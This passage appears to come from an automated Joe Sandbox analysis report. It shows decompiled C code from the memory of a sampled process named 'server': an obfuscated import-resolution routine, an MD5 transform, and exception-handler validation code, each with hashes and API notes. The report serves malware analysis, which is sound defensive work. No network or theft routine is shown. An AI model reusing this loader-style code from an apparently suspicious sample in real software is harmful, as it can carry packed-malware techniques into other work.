                      											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                      												goto L12;
                      											} else {
                      												goto L11;
                      											}
                      										}
                      									} else {
                      										_t51 = _t51 + _t69;
                      										L11:
                      										_v8 = _t51;
                      									}
                      									_t53 = _v8;
                      									__eflags = _t53;
                      									if(_t53 == 0) {
                      										_t54 = _v24 & 0x0000ffff;
                      									} else {
                      										_t54 = _t53 + 2;
                      									}
                      									_t55 = GetProcAddress(_v28, _t54);
                      									__eflags = _t55;
                      									if(__eflags == 0) {
                      										_v20 = _t59 - 0x43175a44;
                      									} else {
                      										_t68 = _v8;
                      										__eflags = _t68;
                      										if(_t68 != 0) {
                      											 *_t68 = _t59 - 0x43175ac3;
                      										}
                      										 *_v16 = _t55;
                      										_t58 = _t59 * 4 - 0xc5d6b08;
                      										_t73 = _t73 + _t58;
                      										_t32 =  &_v16;
                      										 *_t32 = _v16 + _t58;
                      										__eflags =  *_t32;
                      										continue;
                      									}
                      									goto L23;
                      								}
                      							} else {
                      								_t50 = _t61;
                      								if(_t61 != 0) {
                      									goto L6;
                      								}
                      							}
                      							L23:
                      							_v12 = _v12 + 0x14;
                      							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                      							if(_t46 != 0) {
                      								continue;
                      							} else {
                      							}
                      							L26:
                      							goto L27;
                      						}
                      						_t60 = _t59 + 0xbce8a5bb;
                      						__eflags = _t60;
                      						_v20 = _t60;
                      						goto L26;
                      					}
                      				}
                      				L27:
                      				return _v20;
                      			}

                      APIs
                      • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID:
                      • API String ID: 2574300362-0
                      • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                      • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
                      • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                      • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 49%
                      			E02BD16DF(void* __ecx, intOrPtr* _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				void _v76;
                      				intOrPtr* _t226;
                      				signed int _t229;
                      				signed int _t231;
                      				signed int _t233;
                      				signed int _t235;
                      				signed int _t237;
                      				signed int _t239;
                      				signed int _t241;
                      				signed int _t243;
                      				signed int _t245;
                      				signed int _t247;
                      				signed int _t249;
                      				signed int _t251;
                      				signed int _t253;
                      				signed int _t255;
                      				signed int _t257;
                      				signed int _t259;
                      				signed int _t338;
                      				signed char* _t348;
                      				signed int _t349;
                      				signed int _t351;
                      				signed int _t353;
                      				signed int _t355;
                      				signed int _t357;
                      				signed int _t359;
                      				signed int _t361;
                      				signed int _t363;
                      				signed int _t365;
                      				signed int _t367;
                      				signed int _t376;
                      				signed int _t378;
                      				signed int _t380;
                      				signed int _t382;
                      				signed int _t384;
                      				intOrPtr* _t400;
                      				signed int* _t401;
                      				signed int _t402;
                      				signed int _t404;
                      				signed int _t406;
                      				signed int _t408;
                      				signed int _t410;
                      				signed int _t412;
                      				signed int _t414;
                      				signed int _t416;
                      				signed int _t418;
                      				signed int _t420;
                      				signed int _t422;
                      				signed int _t424;
                      				signed int _t432;
                      				signed int _t434;
                      				signed int _t436;
                      				signed int _t438;
                      				signed int _t440;
                      				signed int _t508;
                      				signed int _t599;
                      				signed int _t607;
                      				signed int _t613;
                      				signed int _t679;
                      				void* _t682;
                      				signed int _t683;
                      				signed int _t685;
                      				signed int _t690;
                      				signed int _t692;
                      				signed int _t697;
                      				signed int _t699;
                      				signed int _t718;
                      				signed int _t720;
                      				signed int _t722;
                      				signed int _t724;
                      				signed int _t726;
                      				signed int _t728;
                      				signed int _t734;
                      				signed int _t740;
                      				signed int _t742;
                      				signed int _t744;
                      				signed int _t746;
                      				signed int _t748;
                      
                      				_t226 = _a4;
                      				_t348 = __ecx + 2;
                      				_t401 =  &_v76;
                      				_t682 = 0x10;
                      				do {
                      					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                      					_t401 =  &(_t401[1]);
                      					_t348 =  &(_t348[4]);
                      					_t682 = _t682 - 1;
                      				} while (_t682 != 0);
                      				_t6 = _t226 + 4; // 0x14eb3fc3
                      				_t683 =  *_t6;
                      				_t7 = _t226 + 8; // 0x8d08458b
                      				_t402 =  *_t7;
                      				_t8 = _t226 + 0xc; // 0x56c1184c
                      				_t349 =  *_t8;
                      				asm("rol eax, 0x7");
                      				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                      				asm("rol ecx, 0xc");
                      				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                      				asm("ror edx, 0xf");
                      				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                      				asm("ror esi, 0xa");
                      				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                      				_v8 = _t685;
                      				_t690 = _v8;
                      				asm("rol eax, 0x7");
                      				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                      				asm("rol ecx, 0xc");
                      				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                      				asm("ror edx, 0xf");
                      				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                      				asm("ror esi, 0xa");
                      				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                      				_v8 = _t692;
                      				_t697 = _v8;
                      				asm("rol eax, 0x7");
                      				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                      				asm("rol ecx, 0xc");
                      				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                      				asm("ror edx, 0xf");
                      				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                      				asm("ror esi, 0xa");
                      				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                      				_v8 = _t699;
                      				asm("rol eax, 0x7");
                      				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                      				asm("rol ecx, 0xc");
                      				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                      				_t508 =  !_t357;
                      				asm("ror edx, 0xf");
                      				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                      				_v12 = _t410;
                      				_v12 =  !_v12;
                      				asm("ror esi, 0xa");
                      				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                      				asm("rol eax, 0x5");
                      				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                      				asm("rol ecx, 0x9");
                      				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                      				asm("rol edx, 0xe");
                      				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                      				asm("ror esi, 0xc");
                      				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                      				asm("rol eax, 0x5");
                      				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                      				asm("rol ecx, 0x9");
                      				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                      				asm("rol edx, 0xe");
                      				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                      				asm("ror esi, 0xc");
                      				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                      				asm("rol eax, 0x5");
                      				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                      				asm("rol ecx, 0x9");
                      				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                      				asm("rol edx, 0xe");
                      				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                      				asm("ror esi, 0xc");
                      				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                      				asm("rol eax, 0x5");
                      				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                      				asm("rol ecx, 0x9");
                      				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                      				asm("rol edx, 0xe");
                      				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                      				asm("ror esi, 0xc");
                      				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                      				asm("rol eax, 0x4");
                      				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                      				asm("rol ecx, 0xb");
                      				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                      				asm("rol edx, 0x10");
                      				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                      				_t599 = _t367 ^ _t420;
                      				asm("ror esi, 0x9");
                      				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                      				asm("rol eax, 0x4");
                      				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                      				asm("rol edi, 0xb");
                      				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                      				asm("rol edx, 0x10");
                      				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                      				_t338 = _t607 ^ _t422;
                      				asm("ror ecx, 0x9");
                      				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                      				asm("rol eax, 0x4");
                      				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                      				asm("rol esi, 0xb");
                      				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                      				asm("rol edi, 0x10");
                      				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                      				_t424 = _t734 ^ _t613;
                      				asm("ror ecx, 0x9");
                      				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                      				asm("rol eax, 0x4");
                      				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                      				asm("rol edx, 0xb");
                      				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                      				asm("rol esi, 0x10");
                      				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                      				asm("ror ecx, 0x9");
                      				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                      				asm("rol eax, 0x6");
                      				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                      				asm("rol edx, 0xa");
                      				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                      				asm("rol esi, 0xf");
                      				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                      				asm("ror ecx, 0xb");
                      				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                      				asm("rol eax, 0x6");
                      				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                      				asm("rol edx, 0xa");
                      				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                      				asm("rol esi, 0xf");
                      				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                      				asm("ror ecx, 0xb");
                      				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                      				asm("rol eax, 0x6");
                      				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                      				asm("rol edx, 0xa");
                      				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                      				asm("rol esi, 0xf");
                      				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                      				asm("ror edi, 0xb");
                      				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                      				asm("rol eax, 0x6");
                      				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                      				asm("rol edx, 0xa");
                      				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                      				_t400 = _a4;
                      				asm("rol esi, 0xf");
                      				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                      				 *_t400 =  *_t400 + _t259;
                      				asm("ror eax, 0xb");
                      				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                      				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                      				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                      				return memset( &_v76, 0, 0x40);
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: memset
                      • String ID:
                      • API String ID: 2221118986-0
                      • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
                      • Instruction ID: 4ba399f6db46f051f02c68140a876eb24c9f3177e53227775654226836366692
                      • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
                      • Instruction Fuzzy Hash: DA22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD8551(long _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				short* _v32;
                      				void _v36;
                      				void* _t57;
                      				signed int _t58;
                      				signed int _t61;
                      				signed int _t62;
                      				void* _t63;
                      				signed int* _t68;
                      				intOrPtr* _t69;
                      				intOrPtr* _t71;
                      				intOrPtr _t72;
                      				intOrPtr _t75;
                      				void* _t76;
                      				signed int _t77;
                      				void* _t78;
                      				void _t80;
                      				signed int _t81;
                      				signed int _t84;
                      				signed int _t86;
                      				short* _t87;
                      				void* _t89;
                      				signed int* _t90;
                      				long _t91;
                      				signed int _t93;
                      				signed int _t94;
                      				signed int _t100;
                      				signed int _t102;
                      				void* _t104;
                      				long _t108;
                      				signed int _t110;
                      
                      				_t108 = _a4;
                      				_t76 =  *(_t108 + 8);
                      				if((_t76 & 0x00000003) != 0) {
                      					L3:
                      					return 0;
                      				}
                      				_a4 =  *[fs:0x4];
                      				_v8 =  *[fs:0x8];
                      				if(_t76 < _v8 || _t76 >= _a4) {
                      					_t102 =  *(_t108 + 0xc);
                      					__eflags = _t102 - 0xffffffff;
                      					if(_t102 != 0xffffffff) {
                      						_t91 = 0;
                      						__eflags = 0;
                      						_a4 = 0;
                      						_t57 = _t76;
                      						do {
                      							_t80 =  *_t57;
                      							__eflags = _t80 - 0xffffffff;
                      							if(_t80 == 0xffffffff) {
                      								goto L9;
                      							}
                      							__eflags = _t80 - _t91;
                      							if(_t80 >= _t91) {
                      								L20:
                      								_t63 = 0;
                      								L60:
                      								return _t63;
                      							}
                      							L9:
                      							__eflags =  *(_t57 + 4);
                      							if( *(_t57 + 4) != 0) {
                      								_t12 =  &_a4;
                      								 *_t12 = _a4 + 1;
                      								__eflags =  *_t12;
                      							}
                      							_t91 = _t91 + 1;
                      							_t57 = _t57 + 0xc;
                      							__eflags = _t91 - _t102;
                      						} while (_t91 <= _t102);
                      						__eflags = _a4;
                      						if(_a4 == 0) {
                      							L15:
                      							_t81 =  *0x2bda380; // 0x0
                      							_t110 = _t76 & 0xfffff000;
                      							_t58 = 0;
                      							__eflags = _t81;
                      							if(_t81 <= 0) {
                      								L18:
                      								_t104 = _t102 | 0xffffffff;
                      								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                      								__eflags = _t61;
                      								if(_t61 < 0) {
                      									_t62 = 0;
                      									__eflags = 0;
                      								} else {
                      									_t62 = _a4;
                      								}
                      								__eflags = _t62;
                      								if(_t62 == 0) {
                      									L59:
                      									_t63 = _t104;
                      									goto L60;
                      								} else {
                      									__eflags = _v12 - 0x1000000;
                      									if(_v12 != 0x1000000) {
                      										goto L59;
                      									}
                      									__eflags = _v16 & 0x000000cc;
                      									if((_v16 & 0x000000cc) == 0) {
                      										L46:
                      										_t63 = 1;
                      										 *0x2bda3c8 = 1;
                      										__eflags =  *0x2bda3c8;
                      										if( *0x2bda3c8 != 0) {
                      											goto L60;
                      										}
                      										_t84 =  *0x2bda380; // 0x0
                      										__eflags = _t84;
                      										_t93 = _t84;
                      										if(_t84 <= 0) {
                      											L51:
                      											__eflags = _t93;
                      											if(_t93 != 0) {
                      												L58:
                      												 *0x2bda3c8 = 0;
                      												goto L5;
                      											}
                      											_t77 = 0xf;
                      											__eflags = _t84 - _t77;
                      											if(_t84 <= _t77) {
                      												_t77 = _t84;
                      											}
                      											_t94 = 0;
                      											__eflags = _t77;
                      											if(_t77 < 0) {
                      												L56:
                      												__eflags = _t84 - 0x10;
                      												if(_t84 < 0x10) {
                      													_t86 = _t84 + 1;
                      													__eflags = _t86;
                      													 *0x2bda380 = _t86;
                      												}
                      												goto L58;
                      											} else {
                      												do {
                      													_t68 = 0x2bda388 + _t94 * 4;
                      													_t94 = _t94 + 1;
                      													__eflags = _t94 - _t77;
                      													 *_t68 = _t110;
                      													_t110 =  *_t68;
                      												} while (_t94 <= _t77);
                      												goto L56;
                      											}
                      										}
                      										_t69 = 0x2bda384 + _t84 * 4;
                      										while(1) {
                      											__eflags =  *_t69 - _t110;
                      											if( *_t69 == _t110) {
                      												goto L51;
                      											}
                      											_t93 = _t93 - 1;
                      											_t69 = _t69 - 4;
                      											__eflags = _t93;
                      											if(_t93 > 0) {
                      												continue;
                      											}
                      											goto L51;
                      										}
                      										goto L51;
                      									}
                      									_t87 = _v32;
                      									__eflags =  *_t87 - 0x5a4d;
                      									if( *_t87 != 0x5a4d) {
                      										goto L59;
                      									}
                      									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                      									__eflags =  *_t71 - 0x4550;
                      									if( *_t71 != 0x4550) {
                      										goto L59;
                      									}
                      									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                      									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                      										goto L59;
                      									}
                      									_t78 = _t76 - _t87;
                      									__eflags =  *((short*)(_t71 + 6));
                      									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                      									if( *((short*)(_t71 + 6)) <= 0) {
                      										goto L59;
                      									}
                      									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                      									__eflags = _t78 - _t72;
                      									if(_t78 < _t72) {
                      										goto L46;
                      									}
                      									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                      									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                      										goto L46;
                      									}
                      									__eflags =  *(_t89 + 0x27) & 0x00000080;
                      									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                      										goto L20;
                      									}
                      									goto L46;
                      								}
                      							} else {
                      								goto L16;
                      							}
                      							while(1) {
                      								L16:
                      								__eflags =  *((intOrPtr*)(0x2bda388 + _t58 * 4)) - _t110;
                      								if( *((intOrPtr*)(0x2bda388 + _t58 * 4)) == _t110) {
                      									break;
                      								}
                      								_t58 = _t58 + 1;
                      								__eflags = _t58 - _t81;
                      								if(_t58 < _t81) {
                      									continue;
                      								}
                      								goto L18;
                      							}
                      							__eflags = _t58;
                      							if(_t58 <= 0) {
                      								goto L5;
                      							}
                      							 *0x2bda3c8 = 1;
                      							__eflags =  *0x2bda3c8;
                      							if( *0x2bda3c8 != 0) {
                      								goto L5;
                      							}
                      							__eflags =  *((intOrPtr*)(0x2bda388 + _t58 * 4)) - _t110;
                      							if( *((intOrPtr*)(0x2bda388 + _t58 * 4)) == _t110) {
                      								L32:
                      								_t100 = 0;
                      								__eflags = _t58;
                      								if(_t58 < 0) {
                      									L34:
                      									 *0x2bda3c8 = 0;
                      									goto L5;
                      								} else {
                      									goto L33;
                      								}
                      								do {
                      									L33:
                      									_t90 = 0x2bda388 + _t100 * 4;
                      									_t100 = _t100 + 1;
                      									__eflags = _t100 - _t58;
                      									 *_t90 = _t110;
                      									_t110 =  *_t90;
                      								} while (_t100 <= _t58);
                      								goto L34;
                      							}
                      							_t25 = _t81 - 1; // -1
                      							_t58 = _t25;
                      							__eflags = _t58;
                      							if(_t58 < 0) {
                      								L28:
                      								__eflags = _t81 - 0x10;
                      								if(_t81 < 0x10) {
                      									_t81 = _t81 + 1;
                      									__eflags = _t81;
                      									 *0x2bda380 = _t81;
                      								}
                      								_t28 = _t81 - 1; // 0x0
                      								_t58 = _t28;
                      								goto L32;
                      							} else {
                      								goto L25;
                      							}
                      							while(1) {
                      								L25:
                      								__eflags =  *((intOrPtr*)(0x2bda388 + _t58 * 4)) - _t110;
                      								if( *((intOrPtr*)(0x2bda388 + _t58 * 4)) == _t110) {
                      									break;
                      								}
                      								_t58 = _t58 - 1;
                      								__eflags = _t58;
                      								if(_t58 >= 0) {
                      									continue;
                      								}
                      								break;
                      							}
                      							__eflags = _t58;
                      							if(__eflags >= 0) {
                      								if(__eflags == 0) {
                      									goto L34;
                      								}
                      								goto L32;
                      							}
                      							goto L28;
                      						}
                      						_t75 =  *((intOrPtr*)(_t108 - 8));
                      						__eflags = _t75 - _v8;
                      						if(_t75 < _v8) {
                      							goto L20;
                      						}
                      						__eflags = _t75 - _t108;
                      						if(_t75 >= _t108) {
                      							goto L20;
                      						}
                      						goto L15;
                      					}
                      					L5:
                      					_t63 = 1;
                      					goto L60;
                      				} else {
                      					goto L3;
                      				}
                      			}

                      APIs
                      • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02BD8602
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: MemoryQueryVirtual
                      • String ID:
                      • API String ID: 2850889275-0
                      • Opcode ID: a6f0baeb8d9b326e0e77fa8c206d8078f7aaee0573a031905a4732a361f194a9
                      • Instruction ID: 3b3569d973d083732b49c23488f10ddb0d6aa19aeccd67b7ccc248c51f72ed7b
                      • Opcode Fuzzy Hash: a6f0baeb8d9b326e0e77fa8c206d8078f7aaee0573a031905a4732a361f194a9
                      • Instruction Fuzzy Hash: CB61F435A006029FCB29DE38C9907E977A7FB8576AF2488E9D416CB281F731D843CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 71%
                      			E02BD832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                      				intOrPtr _v8;
                      				char _v12;
                      				void* __ebp;
                      				signed int* _t43;
                      				char _t44;
                      				void* _t46;
                      				void* _t49;
                      				intOrPtr* _t53;
                      				void* _t54;
                      				void* _t65;
                      				long _t66;
                      				signed int* _t80;
                      				signed int* _t82;
                      				void* _t84;
                      				signed int _t86;
                      				void* _t89;
                      				void* _t95;
                      				void* _t96;
                      				void* _t99;
                      				void* _t106;
                      
                      				_t43 = _t84;
                      				_t65 = __ebx + 2;
                      				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                      				_t89 = _t95;
                      				_t96 = _t95 - 8;
                      				_push(_t65);
                      				_push(_t84);
                      				_push(_t89);
                      				asm("cld");
                      				_t66 = _a8;
                      				_t44 = _a4;
                      				if(( *(_t44 + 4) & 0x00000006) != 0) {
                      					_push(_t89);
                      					E02BD8497(_t66 + 0x10, _t66, 0xffffffff);
                      					_t46 = 1;
                      				} else {
                      					_v12 = _t44;
                      					_v8 = _a12;
                      					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                      					_t86 =  *(_t66 + 0xc);
                      					_t80 =  *(_t66 + 8);
                      					_t49 = E02BD8551(_t66);
                      					_t99 = _t96 + 4;
                      					if(_t49 == 0) {
                      						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                      						goto L11;
                      					} else {
                      						while(_t86 != 0xffffffff) {
                      							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                      							if(_t53 == 0) {
                      								L8:
                      								_t80 =  *(_t66 + 8);
                      								_t86 = _t80[_t86 + _t86 * 2];
                      								continue;
                      							} else {
                      								_t54 =  *_t53();
                      								_t89 = _t89;
                      								_t86 = _t86;
                      								_t66 = _a8;
                      								_t55 = _t54;
                      								_t106 = _t54;
                      								if(_t106 == 0) {
                      									goto L8;
                      								} else {
                      									if(_t106 < 0) {
                      										_t46 = 0;
                      									} else {
                      										_t82 =  *(_t66 + 8);
                      										E02BD843C(_t55, _t66);
                      										_t89 = _t66 + 0x10;
                      										E02BD8497(_t89, _t66, 0);
                      										_t99 = _t99 + 0xc;
                      										E02BD8533(_t82[2]);
                      										 *(_t66 + 0xc) =  *_t82;
                      										_t66 = 0;
                      										_t86 = 0;
                      										 *(_t82[2])(1);
                      										goto L8;
                      									}
                      								}
                      							}
                      							goto L13;
                      						}
                      						L11:
                      						_t46 = 1;
                      					}
                      				}
                      				L13:
                      				return _t46;
                      			}

                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
